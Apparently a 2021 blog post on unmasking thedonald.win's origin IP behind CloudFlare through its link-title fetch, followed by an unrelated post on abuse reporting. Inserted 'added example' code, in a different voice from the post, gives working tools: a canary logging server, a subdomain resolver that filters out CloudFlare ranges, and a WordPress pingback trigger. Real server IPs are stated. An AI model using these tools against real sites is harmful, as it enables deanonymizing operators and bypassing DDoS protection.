Masks Off for TheDonald.win
In 2015, a subreddit called /r/The_Donald was created. This has made a lot of people very angry and widely been regarded as a bad move.
Roughly 5 years after its inception, the Reddit staff banned /r/The_Donald because it was a cesspool of hateful content and harmful conspiracy theories. You can learn more about it here.
Why are we talking about this in 2021?
Well, a lot has happened in the first week of the new year. A lot of words have been written about the fascist insurrection that attempted a coup on the U.S. legislature, so I won’t belabor the point more than I have to.
But as it turns out: The shitty people who ran /r/The_Donald didn’t leave well enough alone when they got shit-canned.
Remember: You can’t recycle fash.
(Art by Khia.)
Instead, they spun up a Reddit clone under the domain thedonald.win and hid it behind CloudFlare.
Even worse: Without Reddit rules to keep them in check, they’ve gone all in on political violence and terrorism.
(Content Warning: Fascism, political violence, and a myriad of other nastiness in the Twitter thread below.)
twitter.com/Viking_Sec/status/…
If you remember last year, I published a blog post about identifying the real server IP address from email headers. This is far from a sophisticated technique, but if simple solutions work, why not use them?
(Related, I wrote a post in 2020 about more effectively deplatforming hate and harassment. This knowledge will come in handy if you find yourself needing to stop the spread of political violence, but is strictly speaking not relevant to the techniques discussed on this page.)
Unmasking TheDonald.win
The technique I outlined in my previous post doesn’t work on their Reddit clone software: Although it asks you for an (optional) email address at the time of account registration, it never actually emails you, and there is no account recovery feature (a.k.a. “I forgot my password”).
Foiled immediately! What’s a furry to do?
(Art by Khia.)
However, their software is still a Reddit clone!
Reddit has this feature where you can submit links and it will helpfully fetch the page title for you. It looks like this:
When I paste a URL into this form, it automatically fetches the title.
How this feature works is simple: The site’s back end makes its own HTTP request to the URL you submitted, parses the <title> tag out of the response, and returns it. CloudFlare only sits in front of traffic coming in to the site; an outbound request like this one leaves from wherever the application actually runs.
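To make the shape of the leak concrete, here is an added example (my own code, not thedonald.win’s software or anything from the original post) of a server-side title fetcher in the vulnerable form just described, next to a hardened variant that rejects non-public targets and sends the request through a separate egress proxy. The function names, the proxy address and the sample HTML are assumptions for illustration.

```python
# Added example (not code from thedonald.win or from the original post): a minimal
# server-side "fetch the page title" helper in the vulnerable shape the post describes,
# beside a hardened variant. Names, the egress proxy and the sample HTML are assumptions.
import ipaddress
import socket
import urllib.request
from html.parser import HTMLParser
from urllib.parse import urlparse


class _TitleParser(HTMLParser):
    """Collects the text of the first <title> element."""

    def __init__(self):
        super().__init__()
        self._in_title = False
        self.title = ""

    def handle_starttag(self, tag, attrs):
        if tag == "title" and not self.title:
            self._in_title = True

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data


def extract_title(html: str) -> str:
    """Return the first <title> text with whitespace collapsed ("" if none)."""
    parser = _TitleParser()
    parser.feed(html)
    return " ".join(parser.title.split())


def fetch_title_vulnerable(url: str) -> str:
    """The shape of the leak: the web server itself connects to whatever URL the
    user submitted, so the target's access log records the origin's real IP
    (and internal addresses in `url` are reachable from the server as well)."""
    with urllib.request.urlopen(url, timeout=5) as resp:
        return extract_title(resp.read(65536).decode("utf-8", "replace"))


def check_outbound_url(url: str, resolve=socket.gethostbyname) -> str:
    """Allow only http(s) URLs whose host resolves to a public address.
    Returns the resolved IP; raises ValueError otherwise."""
    parts = urlparse(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    if not parts.hostname:
        raise ValueError("URL has no host")
    ip = ipaddress.ip_address(resolve(parts.hostname))
    if not ip.is_global:
        raise ValueError(f"non-public target {ip}")
    return str(ip)


def fetch_title_hardened(url: str, egress_proxy: str) -> str:
    """Validate the target, then fetch through a dedicated egress proxy (assumed to
    run on a separate host) so the target only ever sees the proxy's address."""
    check_outbound_url(url)
    proxies = {"http": egress_proxy, "https": egress_proxy}
    opener = urllib.request.build_opener(urllib.request.ProxyHandler(proxies))
    with opener.open(url, timeout=5) as resp:
        return extract_title(resp.read(65536).decode("utf-8", "replace"))
```

The privacy fix is the proxy, not the address filter: as long as the web server itself opens the connection, its IP ends up in the target’s logs. Note also that check_outbound_url resolves the hostname once and the proxy resolves it again when connecting, so a rebinding DNS answer can still slip an internal address past the check; pin the resolved IP or have the proxy enforce the same policy.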
So what happens if you control the server their request is routed to, and hand them a unique URL so the fetch is easy to pick out of your logs?
Leaking TheDonald.win’s true IP address from behind CloudFlare.
Well, that was easy! To eliminate false positives, I performed all of this sampling with Tor Browser and manually rebuilt the Tor circuit multiple times, and always got the same IP address: 167.114.145.140.
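What the sampling looks like in code, as an added example rather than anything from the original post: a canary HTTP server that records the address behind every fetch of a unique URL, and the cross-check that the same address showed up for each submission. The host name and IP addresses below are made up.

```python
# Added example (not from the original post): a canary web server that records which
# IP fetches each unique URL handed to the link-title feature, plus the cross-check
# the post performs over several Tor circuits. Host name and sample IPs are made up.
import secrets
from collections import defaultdict
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse


class CanaryStore:
    """token -> list of (remote_ip, user_agent) for every request that reached it."""

    def __init__(self):
        self.hits = defaultdict(list)

    def record(self, path: str, remote_ip: str, user_agent: str = "") -> str:
        token = urlparse(path).path.strip("/").split("/")[-1]
        self.hits[token].append((remote_ip, user_agent))
        return token


def new_canary_url(base: str):
    """Fresh random token, so each submission is attributable to exactly one fetch."""
    token = secrets.token_hex(8)
    return token, f"{base.rstrip('/')}/{token}"


def origin_ip(store: CanaryStore, tokens):
    """The single IP that fetched every token in `tokens`, or None if any token was
    never fetched or the fetches came from more than one address (in which case the
    site may fetch through a pool or an edge proxy rather than from its origin)."""
    seen = set()
    for token in tokens:
        ips = {ip for ip, _ in store.hits.get(token, [])}
        if not ips:
            return None
        seen |= ips
    return seen.pop() if len(seen) == 1 else None


class CanaryHandler(BaseHTTPRequestHandler):
    store = CanaryStore()

    def do_GET(self):
        token = self.store.record(self.path, self.client_address[0],
                                  self.headers.get("User-Agent", ""))
        # Serve a real title so the site's feature "succeeds" and nothing looks odd.
        body = f"<html><head><title>canary {token}</title></head></html>".encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, fmt, *args):
        ip, ua = self.client_address[0], self.headers.get("User-Agent", "")
        print(f"{ip} fetched {self.path} (User-Agent: {ua})")


if __name__ == "__main__":
    # Listen on a host you control that is reachable from the public Internet, then
    # submit new_canary_url("http://canary.example.test")[1] through the title fetch.
    HTTPServer(("0.0.0.0", 8080), CanaryHandler).serve_forever()
```

The Tor exit’s IP never appears in this log, because Tor only carries your browser traffic to the site; the canary sees whichever machine the site uses to fetch titles. If that address turns out to be one of CloudFlare’s, the fetch is being done at the edge and you have learned nothing about the origin. If the canary itself sits behind a reverse proxy, read the client address from the forwarded header your proxy sets instead of client_address.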
An Even Lazier Technique
Just use Shodan, lol
twitter.com/_rarecoil/status/1…
Apparently chuds are really bad at OpSec, and their IP was exposed on Shodan this whole time.
You can’t help but laugh at their incompetence.
(Art by Khia.)
The Road to Accountability
Okay, so we have their real IP address. What can we do with it?
The easiest thing to do is find out who’s hosting their servers, with a simple WHOIS lookup on their IP address.
Hosted by OVH Canada, eh? After all, nothing screams “Proud American” like hosting your website with a French company in a Canadian datacenter.
Dunking on these fools for the inconsistencies in their worldview is self-care and I recommend it, even though I know they don’t care one iota about hypocrisy.
I immediately wondered if their ISP was aware they were hosting right-wing terrorists, so I filed an innocent abuse report with details about how I obtained their IP address and the kind of behavior they’re engaging in. Canada’s laws about hate speech and inciting violence are comparably strict, after all.
I’ll update this post later if OVH decides to take action.
Lessons to Learn
First, don’t tolerate violent political extremists, or you’ll end up with political violence on your hands. Deplatforming works.
twitter.com/witchiebunny/statu…
Second, and most important: Online privacy is hard. Hard enough that bigots, terrorists, and seditious insurrectionists can’t do it right.
This bears emphasizing: None of the techniques I’ve shared on the history of my blog are particularly clever or novel. But they work extremely well, and they’re useful for exposing shitty people.
Remember: Sunlight is the best disinfectant.
Conversely: Basic OSINT isn’t hard; merely tedious.
Other Techniques (from Twitter)
Subdomain leaks (via @z3dster):
twitter.com/z3dster/status/134…
Exploiting CloudFlare workers (via @4dwins):
twitter.com/4dwins/status/1347…
DNS enumeration (via @JoshFarwell):
twitter.com/JoshFarwell/status…
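The subdomain and DNS techniques in the tweets above rest on the same idea: CloudFlare only covers the names that were put behind it, and services that cannot be proxied (SMTP, FTP, a control panel) or that were simply forgotten resolve straight to the origin. As an added example (not from the original post or the linked tweets), the snippet below resolves a list of likely names under a domain and keeps those that answer with a non-CloudFlare address. The domain, the label list and the resolver answers are made up; the CloudFlare ranges are a snapshot of the list published at https://www.cloudflare.com/ips-v4 and should be refreshed before use.

```python
# Added example (not from the original post or the tweets it links): resolve a
# handful of likely hostnames under a domain and keep the ones that answer with
# a non-CloudFlare address. The domain, label list and resolver results are made up;
# the CloudFlare ranges are a snapshot of https://www.cloudflare.com/ips-v4.
import ipaddress
import socket

CLOUDFLARE_V4 = [ipaddress.ip_network(n) for n in (
    "173.245.48.0/20", "103.21.244.0/22", "103.22.200.0/22", "103.31.4.0/22",
    "141.101.64.0/18", "108.162.192.0/18", "190.93.240.0/20", "188.114.96.0/20",
    "197.234.240.0/22", "198.41.128.0/17", "162.158.0.0/15", "104.16.0.0/13",
    "104.24.0.0/14", "172.64.0.0/13", "131.0.72.0/22",
)]

# Names that commonly exist but cannot be proxied (SMTP, FTP, control panels) or
# were simply never switched to the orange cloud. Assumed list, extend as needed.
COMMON_LABELS = ("www", "mail", "smtp", "mx", "ftp", "cpanel", "webmail",
                 "direct", "origin", "dev", "staging", "api", "vpn")


def is_cloudflare(ip: str) -> bool:
    """True if the address falls inside the snapshot of CloudFlare's IPv4 ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in CLOUDFLARE_V4)


def unproxied_hosts(domain, labels=COMMON_LABELS, resolve=socket.gethostbyname):
    """{hostname: ip} for each label.domain that resolves to a non-CloudFlare IP.
    `resolve` is injectable so the logic can be exercised without live DNS."""
    found = {}
    for label in labels:
        name = f"{label}.{domain}"
        try:
            ip = resolve(name)
        except OSError:  # NXDOMAIN / timeout: socket.gaierror is an OSError
            continue
        if not is_cloudflare(ip):
            found[name] = ip
    return found
```

Run it with the default resolver against a real domain to query live DNS. MX records are a useful addition (mail for a domain behind CloudFlare often points straight at the origin), but the standard library cannot query them; use dig MX or dnspython for that. A non-CloudFlare answer is a candidate, not a confirmation: a mail host may live on a different box from the web server, so confirm it with one of the server-side fetch tricks above.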
If the site in question is running WordPress, you can use Pingbacks to get WordPress to cough up the server IP address. If you aren’t sure if something runs WordPress, here’s the lazy way to detect that: view any page’s source code and see if the string /wp-content shows up in any URLs (especially for CSS). If it’s found, you’re probably dealing with WordPress.
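As an added example (not from the original post), here is the lazy WordPress check and the XML-RPC request behind the pingback trick. pingback.ping(sourceURI, targetURI) is the standard Pingback method, which WordPress serves at /xmlrpc.php; WordPress verifies a pingback by fetching sourceURI to confirm it links to targetURI, and that fetch is made by the web server itself, so point sourceURI at a canary you control. Hostnames and the sample HTML are made up.

```python
# Added example (not from the original post): the lazy WordPress check the post
# describes, plus the XML-RPC pingback.ping request that makes WordPress fetch a
# URL you control. Hostnames and the sample HTML are made up.
import re
import urllib.request
import xmlrpc.client

WP_ASSET = re.compile(r"/wp-(?:content|includes)/", re.IGNORECASE)


def looks_like_wordpress(html: str) -> bool:
    """True if any URL in the page references /wp-content/ or /wp-includes/."""
    return WP_ASSET.search(html) is not None


def pingback_payload(source_uri: str, target_uri: str) -> bytes:
    """XML-RPC body for pingback.ping(sourceURI, targetURI). WordPress verifies the
    pingback by fetching sourceURI to check that it links to targetURI, and that
    fetch comes from the web server itself: make sourceURI a canary you control."""
    return xmlrpc.client.dumps((source_uri, target_uri),
                               methodname="pingback.ping").encode()


def decode_pingback(body: bytes):
    """Parse an XML-RPC request body back into (methodname, params), handy for
    checking what you are about to send."""
    params, method = xmlrpc.client.loads(body.decode())
    return method, params


def send_pingback(xmlrpc_url: str, source_uri: str, target_uri: str) -> str:
    """POST the pingback. xmlrpc_url is normally https://<site>/xmlrpc.php, and
    target_uri must be an existing post on that site or WordPress will not fetch
    sourceURI at all."""
    req = urllib.request.Request(
        xmlrpc_url,
        data=pingback_payload(source_uri, target_uri),
        headers={"Content-Type": "text/xml"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read().decode("utf-8", "replace")
```

Whatever the XML-RPC response says (WordPress reports an error if the source does not link back), the canary log is what matters: the request for sourceURI arrives from the server’s real address, exactly like the title fetch above.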
Gab (another platform favored by right-wing extremists) had its IP address discovered through their Image Proxy feature: 216.66.0.222 (via @kubeworm):
twitter.com/kubeworm/status/13…
The Alt-Right Notices this Blog Post
Shortly after I posted this online, some users from thedonald.win noticed this blog post and hilarity ensued.
twitter.com/SoatokDhole/status…
I want to make something clear in case anyone (especially members of toxic Trump-supporting communities) is confused:
What’s published on this page isn’t doxing, nor do I have any interest in doxing people. That’s the job of law enforcement, not furry bloggers who sometimes write about computer topics. And law enforcement definitely doesn’t need my help: When you create an account, you must solve a reCAPTCHA challenge, which their server then verifies with an HTTP request sent directly to Google’s servers; that means law enforcement could just subpoena Google for the IP address of the server, even if the above leaks were all patched.
This also isn’t the sort of thing I’d ever brag about, since the entire point I’ve been making is what I’ve done here isn’t technically challenging. If I wanted to /flex, I’d just talk more about my work on constant-time algorithm implementations.
If, in response to my abuse report, OVH Canada determines that their website isn’t violating OVH’s terms of service, then y’all have nothing to worry about.
But given the amount of rampant hate speech being hosted in Canadian jurisdiction, I wouldn’t make that bet.
Addendum (2021-01-19)
Additionally, this wasn’t as simple as running a WHOIS search on thedonald.win either, since that only coughs up the CloudFlare IP addresses. I went a step further and got the real IP address of the server behind CloudFlare, not just CloudFlare’s IP.
This isn’t rocket science, folks.
According to CBC Canada, they moved off OVH Canada the same day this blog post went live. I’m willing to bet a simple WHOIS query won’t yield their current, non-CloudFlare IP address. (To wit: If you think the steps taken in this blog post are so unimpressive to warrant mockery, why not discover the non-CloudFlare IP for yourselves? I’ll bet you can’t.)
There are a lot of ways to deflect criticism for your system administrators’ mistakes, but being overly reductionist and claiming I “just” ran a WHOIS query (which, as stated above, wouldn’t work because of CloudFlare) is only hurting your users by instilling in them a false sense of security.
Just admit it: You fucked up, and got outfoxed by a random furry blogger, and then moved hosting providers after patching the IP leak. How hard is that?
Also, if anyone from CloudFlare is reading this: You should really dump your violent extremist customers before they hurt more people. I’m a strong proponent of freedom of speech–especially for sex workers, the most censored group online–but they’re actively spreading hate and planning violent attacks like the Capitol Hill Riot of January 6, 2021. Pull the damn plug, man.
Finally, I highly recommend Innuendo Studios’ series, The Alt-Right Playbook, for anyone who’s trying to make sense of the surge in right-wing violence we’ve been seeing in America for the past few years.
How Do You Know This IP Wasn’t Bait?
After I published this article, the developers of their software hobbled the Get Suggested Title feature of their software, and the system administrators cancelled their OVH hosting account and moved to another ISP. (Source.)
You can independently verify that their software is hobbled: Try to fetch the page title for a random news website, or Wikipedia article, with the developer console open. It will stall for a while then return an empty string instead of the page title.
They also changed their domain name to patriots.win.
If the IP address I’d found was bait, why would they break a core piece of their software’s functionality and then hurriedly migrate their server elsewhere?
The very notion doesn’t stand up to common sense, let alone greater scrutiny. The whole point of bait is to catch people making a mistake–presumably so you can mock them while remaining totally unaffected–not so you can do these things in a hurry.
A much more likely story: Anyone who makes this claim is trying to downplay a mistake and save face.
Header art by Kyume
#cloudflare #deanonymize #hateSpeech #OnlinePrivacy #Technology
Deplatforming Works (Jason Koebler, VICE): Alex Jones says getting banned by YouTube and Facebook will only make him stronger. The research says that’s not true.
Deplatforming Hate and Harassment
Earlier this year, I detailed a simple technique for deanonymizing scam sites on CloudFlare, by getting the back-end webserver to email you and reveal the server’s IP address (so you can forward your complaints to their ISP). In a similar vein, I’d like to explain a simple technique for increasing the likelihood that your abuse reports on social media websites like Twitter get taken seriously.
Don’t Use the Easy Button
Every tweet (except your own) has a Report Tweet link attached to it. The user interface is different on web and mobile, but most people know how to find it. The problem with this “easy button” is twofold:
- It’s low-effort and high-bandwidth, so a lot of people use it and therefore the signal-to-noise ratio isn’t very high.
- The “report tweet” workflow lets you select from one of a few narrowly defined categories of abuse without giving you any space to explain why it’s abusive.
For example: A lot of anti-furry hate is a dogwhistle for ableist or queerphobic rhetoric. Without knowing that context, how do you expect the folks handling abuse reports for social media companies to make the correct choice?
Instead, File an Abuse Report
This is actually a separate thing, and the link to the harassment report form is here. (This is one of many forms you can file with Twitter’s support team.) Not only do you get to click the radio buttons that the Quick and Easy path allows, you also get to fill in a description of the problem.
A screenshot of the harassment report form.
The difference here isn’t theoretical; a concise explanation of the problem is the difference between your report being ignored and this:
twitter.com/SoatokDhole/status…
If you have any friends that are frequent targets of social media harassment, and their reports aren’t taken seriously, share this article with them.
Art by Khia.
(That being said, I’m really sorry this is even necessary.)
What About Automation?
One motivation to still use the “easy button” when reporting abuse is if you’re hoping to trigger some automated mechanism (e.g. “If 3 different accounts report this as abuse, suspend their account until someone can investigate”). In that case, press that easy button to your heart’s content.
twitter.com/packonines/status/…
#abuseReporting #cyberbullying #harassment #hateSpeech #onlineAbuse #SocialMedia #Twitter
If You Hate Furries, You’re Anti-LGBT (Soatok Dreamseeker, Medium): When someone says, “I hate furries,” that’s a dog-whistle for anti-queer bigotry. If it’s not immediately clear why this is the case, I’ll explain why this is true. Observation: Homophobia is…